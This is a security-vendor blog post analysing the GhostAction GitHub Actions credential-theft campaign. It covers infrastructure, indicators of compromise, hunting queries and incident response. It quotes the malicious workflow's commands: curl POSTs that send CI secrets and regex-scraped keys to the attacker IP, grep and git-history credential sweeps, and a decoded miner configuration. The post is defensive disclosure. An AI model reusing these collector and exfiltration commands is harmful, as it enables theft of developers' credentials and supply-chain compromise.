# GhostAction Attack Escalates By Targeting GitHub Users

> Source: <https://opensourcemalware.com/blog/ghostaction-attack-escalates>
> Published: 2026-10-09 23:55:53+00:00

BLOG

# GhostAction Attack Escalates By Targeting GitHub Users

OSM has identified a new evolution of the GhostAction attack, which targets GitHub users via malicious CI workflow files and worm-like behaviour

By c0a15726-c5b1-4b0d-85e6-fe15553df9e2 ·

OpenSourceMalware has identified a new stage in the ongoing "GhostAction" malicious campaign that GitGuardian originally [identified](https://blog.gitguardian.com/ghostaction-campaign-3-325-secrets-stolen/) in 2025. This latest evolution appears to be an escalation and used two new domains targeting GitHub and GitLab.

The GhostAction campaign is a continuing supply-chain campaign in which attackers compromise GitHub accounts and inject malicious Actions workflows across every repository those accounts can modify. Triggered by pushes or manual execution, the workflows steal CI/CD secrets—including package-publishing, cloud, GitHub, and AI-service credentials—and exfiltrate them to attacker-controlled infrastructure. Later variants expanded collection by scanning repository contents and complete git history, recovering credentials that developers believed had been deleted. GitGuardian (https://blog.gitguardian.com/ghostaction-github-actions-supply-chain-attack- returns/)

Earlier today [Socket](https://socket.dev/blog/ghostaction-cloud-credentials) and [StepSecurity](https://www.stepsecurity.io/blog/ghostaction-returns) subsequently traced a renewed, highly automated wave to compromised maintainers whose access exposed hundreds of repositories, including prominent projects and long-dormant codebases. Their findings show that GhostAction remains an active account-takeover and credential-theft operation: attackers enumerate all writable repositories, push workflows directly without review, trigger executions, and use stolen publishing or cloud secrets to enable further supply-chain compromise.

The established GhostAction payload reads specifically named GitHub Actions secrets and sends them to attacker infrastructure. The newer `.github/workflows/security-audit.yml` variant also searches the complete checkout and git history for credential-shaped strings, captures contextual lines surrounding AWS keys, and POSTs the combined results over unencrypted HTTP to `193.32.204.199/?c=monami`.

Responders must assume exposure of active Actions secrets and credentials previously committed and later deleted. Removing the workflow does not revoke stolen credentials, invalidate the GitHub token used to alter the repository, or address packages, images, releases, and deployments produced during the compromise.

## Early Warning: A Possible New Developer-Targeting Wave

Two newly registered, code-hosting-themed domains may signal the next phase of developer targeting. `my-gitlab.com` was registered on September 22, 2026, followed 17 days later by `my-github.com`. The domains share the exact `my-<major code-host>.com` construction and the parallel `<brand>.my-<brand>.com` form. `my-github.com` points directly to the active GhostAction collector IP; `gitlab.my-gitlab.com` hosts an apparent GitLab service on separate AWS infrastructure. Common ownership is not yet proven, but the naming, timing, and developer-facing services justify early monitoring for phishing, malicious clone URLs, token theft, CI configuration abuse, and payload delivery.

The infrastructure suggests a possible shift from conspicuous IP-address collectors toward domains designed to look familiar to developers:

```
my-gitlab.com          registered 2026-09-22
└── gitlab.my-gitlab.com

my-github.com          registered 2026-10-09
└── github.my-github.com
```

This pattern could support several attacks against developers: GitHub or GitLab credential phishing, OAuth or personal-access-token theft, malicious repository clone instructions, fake API endpoints, poisoned package or release downloads, runner registration, and CI/CD secret collection. These are forecast scenarios derived from the naming and exposed services; they have not all been observed.

`my-github.com` is the higher-confidence indicator because it resolves directly to `193.32.204.199`, the current GhostAction exfiltration and scanning host. It also has wildcard DNS, allowing whoever controls the domain to use convincing hostnames without publishing individual records. `my-gitlab.com` is a lower-confidence watchlist domain: its configured `gitlab.my-gitlab.com` hostname resolves to an AWS EC2 address in Hong Kong where passive Shodan data identifies GitLab and nginx on ports 80 and 443.

The pair is not technically attributed to one operator. They use different registrars, registrant records, Cloudflare nameserver pairs, IP addresses, ASNs, and DNS designs, and no shared certificate or account artifact has been recovered. Defenders should nevertheless hunt and monitor both domains now because waiting for confirmed victim telemetry would forfeit the value of the early warning.

Recommended monitoring:

- DNS, proxy, browser, email, and endpoint events containing either apex domain or any subdomain;
- Git remotes, package metadata, documentation, workflow files, and shell history referencing either domain;
- authentication pages, OAuth redirects, personal-access-token prompts, runner-registration instructions, and clone URLs using the domains;
- outbound connections from developer workstations, CI runners, build systems, and package-publishing hosts;
- future DNS, certificate, hosting, and repository changes that create a direct link between the two domains.

## Threat Overview

Attribute

Value

Threat

GhostAction

Type

CI/CD credential theft and software supply-chain intrusion

Platform

GitHub and GitHub Actions

Severity

Critical where workflows can access publishing, cloud, or deployment secrets

First documented

September 2025

Current endpoint

`193.32.204.199` over HTTP

Files

`github_actions_security.yml`, `security-check.yml`, `security-audit.yml`

Triggers

`push`, `workflow_dispatch`

## Discovery

The investigation began with `claudecord`. PyPI version `0.3.2` contains `.github/workflows/github_actions_security.yml`, which POSTs named deployment, npm, and PyPI secrets to `http://193.32.204.199`. Its SHA-256 is:

```
7fbd40446a82c77b23432c6ab73bd8595c98e90e4f4a473198b4d1256f3e8c4b
```

The claimed upstream, `kanavdhanda/claudeCord`, shows the initial implant in commit `a69f8c4`, followed two seconds later by `Trigger security scan`. Commit `dd08e03` added `.github/workflows/security-audit.yml` the next day. Commit `7e03c5a` later removed the remaining malicious workflow.

GitGuardian reported 772 affected repositories between August 31 and September 30. OpenSourceMalware can currently recover 717 through that cutoff and 790 through October 9. Repositories and commits may disappear after disclosure, while injections continued after GitGuardian’s window; the present dataset is therefore a reproducible public lower bound.

### October 8 Mass Injection

Socket and StepSecurity resolved the newest activity to two compressed sweeps:

UTC window

Compromised account

Repositories

Detail

13:20–13:44

`kitao`

27

`kitao/pyxel` received one add and two update commits

21:10–21:26

`henrywoo`

318

39 source repositories, 279 forks, plus `uber/athenadriver`

**Total**

**2 accounts**

**346**

Automated enumeration of writable repositories

The sweep included active projects and repositories dormant for roughly a decade, supporting automated enumeration rather than project selection. `kitao/pyxel` had approximately 18,420 stars at Socket’s collection time. The Uber-owned `uber/athenadriver` repository was reachable because its original author retained write access after the project moved under the Uber organization.

The `athenadriver` injection went directly to `master` without a pull request or review and used the legitimate maintainer identity as author and committer. StepSecurity reports that the commit was unsigned. Author identity therefore provides weak detection when a valid credential is abused; content, review state, burst timing, push path, and runner egress are stronger signals.

Socket observed successful executions and found the workflow still present on default branches it checked on October 9. It had not observed malicious PyPI or [crates.io](http://crates.io) releases attributable to this wave at publication time. That narrows observed impact but does not reduce the need to rotate publishing credentials.

## Infrastructure

Period

Endpoint

Reported repositories

September 2025

`bold-dhawan.45-139-104-115.plesk.page`

~900 total for the wave

September 2025

`carte-avantage.com`

Included above

September 2025

`objective-hopper.45-139-104-115.plesk.page`

Included above

Oct–Dec 2025; March 2026

`170.39.218.2`

~75

Nov 2025; March–April 2026

`*.oast.fun`

~250

Aug–Sept 2026

`193.32.204.199`

772 reported

September 2026

`193.32.204.199:3000/api/workflow/receive?inj=<id>`

7

October 2026

`193.32.204.199/?c=monami`

Unresolved

StepSecurity places the current IP in honeypot telemetry on September 4, 2026 and in an infected public repository on September 5. Those dates provide an earlier investigation boundary than the major public injection bursts.

### Infrastructure Reuse Beyond GhostAction

Dedicated infrastructure research found that `193.32.204.199` is also an active malicious internet scanner. GreyNoise, Shodan, OTX, SCARD, SANS ISC, and [BlockList.de](http://BlockList.de) independently observed scanning, brute-force, web probing, or honeypot traffic. A SANS daily view recorded 11,286 probes to TCP/8080, while SCARD recorded 413 events dominated by suspicious web-scanner user agents. In incident response, distinguish inbound scanning from this IP from outbound GitHub-runner traffic to it; the latter is direct evidence of workflow exfiltration.

The legacy IP `45.139.104.115` has 389 OTX passive-DNS records spanning a phishing-heavy neighborhood. Recurring themes include Ameli/Carte Vitale, government fines, parcel delivery, Netflix, banking, and SNCF. `carte-avantage.com` was independently reported as an SNCF payment-card phishing site before its 2025 GhostAction use. This establishes multi-purpose malicious use of the infrastructure but does not prove that one operator controlled every co-hosted domain.

#### Current IP ownership and exposure

RIPE RDAP assigns `193.32.204.0/24` to the object `vcyber`, with Vigilant Cyber SAS as the registered organization and `abuse@vigilantcyber.top` as the abuse contact. The prefix is currently announced by AS153622, Madina IT. Commercial geolocation sources variously place the address in Helsinki, Istanbul, or Turkey. These records describe allocation, routing, and database-derived location respectively; none establishes where the GhostAction operator resides.

Shodan InternetDB observed OpenSSH 8.9p1 on TCP/22, Apache 2.4.52 on TCP/80, and TCP/8900. URLScan independently recorded `http://193.32.204.199/c/` returning Apache 2.4.52 on Ubuntu. Version-derived CVEs in Shodan are exposure hypotheses and do not prove exploitability.

The scanning evidence is independent of the GitHub campaign:

Source

Observation

GreyNoise

`noise=true`, `classification=malicious`, last seen October 8

Shodan

`scanner` tag

OTX

50 pulses covering HTTP scanning, TCP/8080, brute force, and multi-protocol honeypots

68 attacks across 8 reports

SCARD

413 events; surfaced signature dominated by suspicious web-scanner user agents

SANS ISC

11,286 TCP/8080 probes in a daily top-scanner view

Feed tags such as Mirai, Mozi, WannaCry, or ransomware are not proof that the host ran those malware families. Several OTX pulses are bulk honeypot feeds whose names describe the monitored threat set. The supported finding is that the same IP used for GhostAction exfiltration was generating broad hostile scanning and probing traffic.

#### `my-github.com`: same-day domain on the current collector

`my-github.com` is a new and highly relevant pivot on the active GhostAction IP:

Property

Observation

Registered

`2026-10-09T09:50:00Z`

Registrar

Dynadot Inc., IANA ID 472

Registrant

Not disclosed in public RDAP

Expiration

2027-10-09

Nameservers

`kianchau.ns.cloudflare.com`, `selah.ns.cloudflare.com`

Current A record

`193.32.204.199`

DNSSEC

Not signed in observed registration data

The domain was registered on the day this infrastructure was being publicly investigated and uses a name that impersonates or invokes GitHub. It does not use Cloudflare’s reverse proxy in the observed A record; DNS resolves directly to the GhostAction collector. Public scan reporting associated the domain with Vigilant Cyber hosting and observed a valid TLS presentation.

URLScan submitted `https://my-github.com/SDRVuhYw` at 15:48 UTC on October 9. The observed navigation finished at a YouTube Rickroll URL. That behavior may represent operator taunting, a disposable redirect, an unrelated tenant, or researcher activity after disclosure. It is not evidence of credential phishing by itself.

The timing, brand-related name, and exact A-record overlap make `my-github.com` a high-priority indicator and pivot. There is still no direct workflow, account, registrar, or server-side evidence proving that the GhostAction operator registered it. The report therefore classifies it as **suspicious infrastructure associated by IP, operator attribution unresolved**.

Hunt the domain in DNS, proxy, email, certificate, and GitHub content telemetry:

```
my-github.com
*.my-github.com
"my-github.com" path:.github/workflows
"193.32.204.199" "my-github.com"
```

Any outbound GitHub runner connection to `my-github.com` should be investigated as potential campaign adaptation even if the workflow no longer contains the literal IP.

Four reported labels—`ghassets.my-github.com`, `github.my-github.com`, `api.my-github.com`, and `gh.my-github.com`—also resolve to `193.32.204.199`. None currently has an AAAA, CNAME, or TXT record, and no exact public URLScan capture or OTX passive-DNS history was found for them.

Random control labels also resolve to the same address with the same TTL, confirming wildcard DNS for `*.my-github.com`. The names are semantically consistent with GitHub impersonation, but DNS resolution does not prove they are separately configured services: any invented label resolves. Count the apex as the infrastructure node, retain the four surfaced labels as hunt terms, and require HTTP `Host`, TLS SNI, certificate, email, workflow, or victim telemetry before asserting active use of an individual subdomain.

```
ghassets.my-github.com
github.my-github.com
api.my-github.com
gh.my-github.com
```

#### Related GitLab-themed domain

`my-gitlab.com` was registered on September 22, 2026, 17 days before `my-github.com`. It follows the same `my-<code-host>.com` naming pattern, making it a useful pivot, but current infrastructure does not connect it to GhostAction. It uses Gname rather than Dynadot, has a different Cloudflare nameserver pair, and does not resolve to `193.32.204.199`.

The apex currently has no address or mail records. The explicitly configured `gitlab.my-gitlab.com` hostname resolves to `18.167.164.26`, an AWS EC2 address in Hong Kong. Shodan InternetDB reports ports 80 and 443 with GitLab and nginx fingerprints, consistent with a functioning self-hosted GitLab service. Random subdomain controls return NXDOMAIN, so this domain does not use the wildcard behavior seen on `my-github.com`. Public URLScan, OTX, search, and Certificate Transparency checks produced no malicious or campaign-specific evidence.

Classify `my-gitlab.com` and `gitlab.my-gitlab.com` as **watchlist indicators: relationship unconfirmed**. Their naming and timing warrant monitoring, but treating them as confirmed GhostAction infrastructure would exceed the evidence. Useful next pivots are workflow references, login or clone URLs in endpoint telemetry, certificate reuse, registrar artifacts, victim reports, and future passive-DNS changes.

The strongest connection between `my-gitlab.com` and `my-github.com` is the exact `my-<major code-host>.com` naming construction combined with registration 17 days apart. There is also a parallel `<brand>.my-<brand>.com` form: `gitlab.my-gitlab.com` is explicitly configured, while `github.my-github.com` resolves through the GitHub-themed domain’s wildcard. Tests of analogous GitHub, GitLab, API, asset, registry, package, authentication, and login labels under `my-gitlab.com` returned NXDOMAIN except for `gitlab.my-gitlab.com`; the evidence therefore shows a strong lexical pattern, not a mirrored subdomain deployment.

No operator-specific link was found: the domains use different registrars, privacy/registrant records, Cloudflare nameserver pairs, SOA serials, IP addresses, ASNs, DNS designs, and hosting providers. No shared certificate, passive observation, or relevant indexed co-occurrence was identified. Cloudflare DNS, one-year registration, transfer locks, and disabled DNSSEC are common defaults and carry little attribution weight. The relationship remains a credible hypothesis until a shared token, certificate or key, origin, account, repository reference, payload, or victim-side sequence is recovered.

#### Legacy IP and phishing-platform overlap

ARIN assigns `45.139.104.0/24` to 49.3 Networking LLC, and RIPE routing data shows AS399979 announcing it throughout the relevant 2024–2026 period. OTX passive DNS produced 389 records representing 355 normalized names. At minimum, keyword clustering found 68 parcel/postal impersonation names, 29 French health/Ameli/Carte Vitale names, 13 government/fine/tax names, nine Netflix/streaming names, and seven banking/payment/insurance names.

Examples include `dhl-colis-track.com`, `chronopost-tracker.com`, `ameli-remboursement.com`, `fisc-gouv.info`, `netflix-secure-france.com`, `client-axa.info`, and `leetchi-verif.com`. Independent reputation sources classify several neighbors as phishing, spam, possible malware, or sinkholed infrastructure. This establishes phishing-heavy hosting, though shared hosting prevents assigning every name to GhostAction.

`objective-hopper.45-139-104-115.plesk.page` still resolves to the legacy IP. `bold-dhawan.45-139-104-115.plesk.page` currently returns NXDOMAIN. The adjective-surname labels are consistent with automatically generated Plesk preview hostnames and do not reveal a human registrant.

#### `carte-avantage.com`: phishing-to-GhostAction crossover

Public victim reports describe `sncf.carte-avantage.com` impersonating SNCF Connect and offering a €49 discount card for €2.45. Reports state that the site collected identity and payment-card data while most non-payment navigation was inert. GitGuardian later found `carte-avantage.com` used as a GhostAction exfiltration endpoint.

Current RDAP shows a Dynadot registration from August 15, 2025, an undisclosed registrant, and redemption status after expiration in August 2026. The domain currently returns NXDOMAIN. It received Let’s Encrypt certificates immediately after the 2025 registration, resolved to `45.139.104.115` by August 17, and appeared in GhostAction the following month. That sequence strongly ties the **2025 registration instance** to the legacy campaign infrastructure.

Archives and Certificate Transparency show older domain lives in 2018, 2021–2022, and 2024. The 2025 creation date reflects re-registration rather than first-ever use. Consequently, the 2022/2024 SNCF phishing operator and 2025 GhostAction operator cannot be assumed identical without historical WHOIS, registrar-payment, or server-control evidence. Public RDAP does not expose a defensible individual owner.

Full ownership, routing, passive-DNS, certificate, scanning, and attribution analysis is in `ghostaction_infrastructure_2026-10-09.md`.

## Attack Chain

1. **Valid repository access:** the actor uses access associated with the victim identity. Displayed authorship alone cannot distinguish authorized work from token abuse.
2. **Workflow injection:** a security-themed file is written below`.github/workflows/` .
3. **Execution:** the injection push can trigger the newly added workflow; later pushes retrigger it, and`workflow_dispatch` permits manual execution.
4. **Retriggering:** an inert timestamp comment is appended to`README.md` , creating another push.
5. **Collection:** named Actions secrets are expanded; the new variant also scans current and historical source.
6. **Exfiltration:**`curl --data-binary` sends a victim-labelled multiline record over HTTP.

GitHub resolves `${{ secrets.NAME }}` before Bash receives the script. Missing secrets become empty strings; existing values become command data. Log masking does not prevent the runner from transmitting the underlying value.

## Payload Evolution

### Targeted-secret workflow

The PyPI artifact contains the established collector:

```
curl -s -X POST -d 'DEPLOY_HOST=${{ secrets.DEPLOY_HOST }}&DEPLOY_SSH_KEY=${{ secrets.DEPLOY_SSH_KEY }}&NPM_TOKEN=${{ secrets.NPM_TOKEN }}&PYPI_API_TOKEN=${{ secrets.PYPI_API_TOKEN }}' http://193.32.204.199
```

Secret names vary by victim, indicating that the actor inspected existing workflow or configuration references and generated a tailored collector. It cannot enumerate stored secret values; it references names learned beforehand and relies on Actions expression expansion.

### New `security-audit.yml`

The latest version combines three collectors:

1. explicit repository-specific Actions secrets;
2. regex matches in the checked-out tree;
3. regex matches and contextual lines from all reachable git patches.

It sends results to `http://193.32.204.199/?c=monami`. The query value may label a campaign or collector version; its server-side meaning is unresolved.

### Full-history checkout

```
- uses: actions/checkout@v4
  with:
    fetch-depth: 0
```

`fetch-depth: 0` obtains complete reachable history instead of a shallow checkout. Credentials deleted from the visible branch remain available to `git log -p --all`. The setting is legitimate by itself and becomes high-risk when correlated with secret regexes and an unrelated external POST.

### Victim identity and direct secrets

```
out="REPO=$GITHUB_REPOSITORY"
[ -n "CARGO_REGISTRY_TOKEN=${{ secrets.CARGO_REGISTRY_TOKEN }}&PERSONAL_ACCESS_TOKEN=${{ secrets.PERSONAL_ACCESS_TOKEN }}&PYPI_PASSWORD=${{ secrets.PYPI_PASSWORD }}&PYPI_USERNAME=${{ secrets.PYPI_USERNAME }}" ] && out="$out&..."
```

`GITHUB_REPOSITORY` identifies the victim. Because literal parameter names remain even when all secrets are empty, the `-n` condition is always true. The example targets Rust and Python publishing plus a general access token; observed lists also include cloud, container, SSH, database, bot, npm, PyPI, and GitHub credentials.

### Current-tree collection

```
grepped=$(grep -rEiho "..." --exclude-dir=.git . 2>/dev/null | sort -u)
```

`-r` scans recursively, `-E` enables extended regexes, `-i` ignores case, `-h` removes filenames, and `-o` returns only matches. Errors are hidden and results deduplicated. Targeted families include:

Pattern

Credential

`AKIA...`, `ASIA...`

AWS long-term and STS access-key IDs

`sk-ant-...`

Anthropic

`sk-proj-...`

OpenAI project key

`sk-or-...`

OpenRouter

`ghp_...`, `github_pat_...`

GitHub PATs

`glpat-...`

GitLab PAT

`AIza...`

Google API key

`xox[baprs]-...`

Slack token

`SG.<part>.<part>`

SendGrid key

`secret_access_key...`

AWS secret access key assignment

`aws_session_token...`

AWS session-token assignment

The regex uses PCRE non-capturing groups such as `(?:v1-)?` with `grep -E`, which implements POSIX ERE. Behavior may vary and produce warnings or missed matches; `2>/dev/null` hides failures. This defect reduces reliability but does not neutralize ordinary ERE branches.

### Git-history collection

```
gl=$(git log -p --all 2>/dev/null | head -200000)
hist=$(echo "$gl" | grep -oiE "..." | sort -u | head -300)
```

`git log -p --all` emits metadata and diffs for every reachable reference. The actor retains up to 200,000 output lines and 300 unique matches. Deleted lines are included, so credentials removed from current source can still be collected. Large repositories bias toward recent history because git normally walks newest commits first.

### AWS context collection

```
ctx=$(grep -rEi -B2 -A2 "AKIA...|ASIA..." --exclude-dir=.git . 2>/dev/null | head -150)
hctx=$(echo "$gl" | grep -Ei -B2 -A2 "AKIA...|ASIA..." | head -150)
```

These commands collect two surrounding lines rather than only the key ID. Context may disclose the paired secret key, region, role, account, bucket, hostname, username, or other credentials. Current and historical context are each capped at 150 lines and wrapped with distinctive `AKIA_CTX_START` and `AKIA_CTX_END` markers.

### Exfiltration

```
curl -s -m 20 -X POST --data-binary "$full" "http://193.32.204.199/?c=monami" || true
```

`--data-binary` preserves newlines. The body contains repository identity, named secrets, AWS context, current matches, and historical matches. Plain HTTP exposes stolen data in transit. `-s` suppresses output, `-m 20` limits delay, and `|| true` prevents a failed POST from failing the step. The final non-empty check is always satisfied because the body begins with the repository name, so every run sends at least a victim beacon.

## GitHub Hunting Queries

### High-confidence infrastructure searches

The most effective primary search quotes the IP and scopes the result set to executable GitHub Actions workflow paths, independent of filename:

```
"193.32.204.199" path:.github/workflows
https://github.com/search?q=%22193.32.204.199%22+path%3A.github%2Fworkflows&type=code
```

This query detects `github_actions_security.yml`, `security-check.yml`, `security-audit.yml`, and renamed copies in one pass. Quoting the IP requires the complete literal indicator, while the path constraint removes documentation, IOC feeds, issue templates, and non-executable source files that mention the campaign. Results still require content review because defenders may intentionally commit detections or blocked indicators inside workflow files.

Use the following searches as broader discovery and filename-specific pivots:

```
193.32.204.199 language:YAML
path:github_actions_security.yml 193.32.204.199
path:security-audit.yml 193.32.204.199
path:security-check.yml "193.32.204.199:3000/api/workflow/receive"
```

### Version-specific payload searches

```
path:.github/workflows "AKIA_CTX_START" "git log -p --all"
path:.github/workflows "AKIA_CTX_END" "--data-binary"
path:security-audit.yml "?c=monami"
path:.github/workflows "head -200000" "head -300" "git log -p --all"
path:.github/workflows "aws_session_token" "fetch-depth: 0" "--data-binary"
path:.github/workflows/github_actions_security.yml "Prepare Cache Busting" "send-secrets"
```

### Historical infrastructure

```
path:.github/workflows "bold-dhawan.45-139-104-115.plesk.page"
path:.github/workflows "objective-hopper.45-139-104-115.plesk.page"
path:.github/workflows "carte-avantage.com"
path:.github/workflows "170.39.218.2"
path:.github/workflows "oast.fun" "send-secrets"
```

### Commit history

```
"Add Github Actions Security workflow"
"Update Github Actions Security workflow"
"Add security check workflow"
"Add security audit workflow"
"Update security audit workflow"
"Trigger security scan"
```

Phrase search also returns longer messages and bodies. Fetch the file at each returned SHA and verify infrastructure or a distinctive content marker before assigning it to the campaign.

Detection

Confidence

Guidance

Known IP plus malicious workflow path

Very high

Direct campaign correlation

`AKIA_CTX_START` plus `git log -p --all`

Very high

Distinctive latest collector

`?c=monami` plus `--data-binary`

Very high

Version-specific route

Exact commit message alone

Medium

Validate file at SHA

`fetch-depth: 0` plus secret regexes

Low–medium

Legitimate scanners do this

`security-audit.yml` filename alone

Low

Common legitimate filename

### October 8 Account and Repository Pivots

```
user:henrywoo path:.github/workflows/security-audit.yml
user:kitao path:.github/workflows/security-audit.yml
repo:uber/athenadriver path:.github/workflows/security-audit.yml
repo:kitao/pyxel path:.github/workflows/security-audit.yml
```

Treat fork results separately from source repositories. Socket counted 279 affected forks under `henrywoo`; a committed workflow in a fork becomes an execution risk when Actions is enabled and a qualifying event gives it access to that fork’s secret context.

## Validated Repository Scope

Evidence

Repositories

Validation

Added main workflow

683

Exact message; historical file and IP verified

Updated main workflow

272

Exact message; historical file and IP verified

Port-3000 variant

7

Historical file and endpoint verified

Deduplicated set

790

Union of validated evidence

Supporting datasets are `ghostaction_repositories_summary.csv`, `ghostaction_affected_repositories.csv`, and `ghostaction_trigger_commits_sample.csv` beside this report.

## MITRE ATT&CK

Tactic

Technique

ID

Initial Access

Valid Accounts: Cloud Accounts

T1078.004

Initial Access

Compromise Software Supply Chain

T1195.002

Execution

Unix Shell

T1059.004

Persistence

Event Triggered Execution

T1546

Credential Access

Credentials In Files

T1552.001

Credential Access

Private Keys

T1552.004

Discovery

File and Directory Discovery

T1083

Collection

Data from Local System

T1005

Command and Control

Web Protocols

T1071.001

Exfiltration

Exfiltration Over C2 Channel

T1041

Public evidence does not establish how the original GitHub credentials were obtained.

## Indicators of Compromise

```
193.32.204.199
http://193.32.204.199/?c=monami
http://193.32.204.199:3000/api/workflow/receive?inj=<id>
my-github.com
*.my-github.com
ghassets.my-github.com
github.my-github.com
api.my-github.com
gh.my-github.com
https://my-github.com/SDRVuhYw
170.39.218.2
45.139.104.115
bold-dhawan.45-139-104-115.plesk.page
objective-hopper.45-139-104-115.plesk.page
carte-avantage.com
*.oast.fun

.github/workflows/github_actions_security.yml
.github/workflows/security-check.yml
.github/workflows/security-audit.yml

Prepare Cache Busting
send-secrets
AKIA_CTX_START
AKIA_CTX_END
git log -p --all 2>/dev/null | head -200000
curl -s -m 20 -X POST --data-binary
```

Filenames alone are not malicious indicators; correlate them with infrastructure or behavior.

### Related watchlist indicators—not attributed to GhostAction

```
my-gitlab.com
gitlab.my-gitlab.com
18.167.164.26
```

The IP is shared cloud infrastructure and should only be used with the hostname or other corroborating context.

## Separate DevOpsGPT Miner

Commit `614a565` modifies `Dockerfile`, `run.sh`, and two scheduler files to install and persist XMRig as `/usr/local/bin/pyworker`. Static XOR decoding with `devops2024` yields:

```
pool.supportxmr.com:3333
832eKef1fNRTQdiJeJzsvkMMsogMp22FR2FLX1oaV5BxGfoMcJvkcbFgWgNRyNfsE19D9pdM1zdU7D9kRLdJbM5rU1vjfcL
worker1
--cpu-max-threads-hint=30
--donate-level=0
```

The five expected fields are present, differing from GitGuardian’s conclusion that the configuration was truncated. The miner predates GhostAction in this repository and uses different, tailored tradecraft. Treat it as separate activity through a shared compromised identity unless further evidence connects the operators.

## Incident Response

1. Disable Actions temporarily and preserve workflows, run IDs, logs, commits, audit logs, and package/release records.
2. Revoke GitHub PATs, OAuth grants, App credentials, deploy keys, and sessions associated with the compromised identity.
3. Remove malicious workflows from executable branches and tags; preserve evidence separately.
4. Block campaign infrastructure without contacting it.
5. Rotate every named Actions secret, then search and rotate matching credentials in full git history.
6. Prioritize source-control, registry, cloud, SSH, deployment, database, and container credentials.
7. Audit packages, releases, images, and deployments produced during the compromise window.
8. Rebuild trusted artifacts from a verified pre-compromise commit in a clean environment.

Harden repositories with protected branches, reviewed workflow changes, `.github/workflows/**` ownership rules, least-privilege organization secrets, short-lived credentials, and cloud OIDC. Alert when workflows combine full-history checkout, git-diff scanning, credential regexes, and outbound network clients.

Require approval for new or modified workflows wherever repository policy permits it. StepSecurity reports that workflow approval was the control observed stopping exfiltration in this wave. Apply runner egress allowlists as a second layer: the collector connects directly to a raw IP on ports 80 or 3000, producing no DNS lookup for domain-only controls to inspect. Historical network telemetry for those destinations can identify the repository, workflow, job, and step that attempted collection.

## Limitations

- Deleted, private, force-pushed, and unindexed repositories are outside the recoverable public set.
- The prevalence of the newest exact `security-audit.yml` variant remains unresolved because its generic commit message creates substantial noise.
- Workflow content proves attempted collection, not successful delivery or credential validity.
- `c=monami` and`inj=<id>` appear to route or label collection; attacker infrastructure was not contacted.
- Additional malware may exist under unrelated names or commit messages.

## References

- [GitGuardian GhostAction report](https://blog.gitguardian.com/ghostaction-github-actions-supply-chain-attack-returns/)
- [StepSecurity: GhostAction Returns](https://www.stepsecurity.io/blog/ghostaction-returns)
- [Socket: New GhostAction Wave Hits Hundreds of Repositories](https://socket.dev/blog/ghostaction-cloud-credentials)
- [GreyNoise record for](https://viz.greynoise.io/ip/193.32.204.199) `193.32.204.199`
- [SANS ISC TCP/8080 scanner telemetry](https://isc.sans.edu/data/port/8080)
- [SCARD suspicious-source telemetry](https://bad.ip.org.au/)
- [SNCF phishing reports for](https://www.signal-arnaques.com/scam/view/735323) `carte-avantage.com`
- [Verisign RDAP for](https://rdap.verisign.com/com/v1/domain/carte-avantage.com) `carte-avantage.com`
- [GitHub: Using secrets in Actions](https://docs.github.com/en/actions/how-tos/write-workflows/choose-what-workflows-do/use-secrets)
- [MITRE ATT&CK T1195.002](https://attack.mitre.org/techniques/T1195/002/)
- [MITRE ATT&CK T1552.001](https://attack.mitre.org/techniques/T1552/001/)
- [GitHub search: IOC in YAML](https://github.com/search?q=193.32.204.199+language%3AYAML&type=code&l=YAML)
- [GitHub search: quoted IOC under](https://github.com/search?q=%22193.32.204.199%22+path%3A.github%2Fworkflows&type=code) `.github/workflows`
- [GitHub search: main workflow](https://github.com/search?q=path%3Agithub_actions_security.yml+193.32.204.199&type=code)
- [GitHub search: new audit workflow](https://github.com/search?q=path%3Asecurity-audit.yml+193.32.204.199&type=code)
- [PyPI: claudecord](https://pypi.org/project/claudecord/)
- [OpenSourceMalware GhostAction infrastructure assessment](ghostaction_infrastructure_2026-10-09.md)

Report suspicious packages and repositories to [OpenSourceMalware.com](https://opensourcemalware.com).

*Report generated by the OpenSourceMalware Team.*
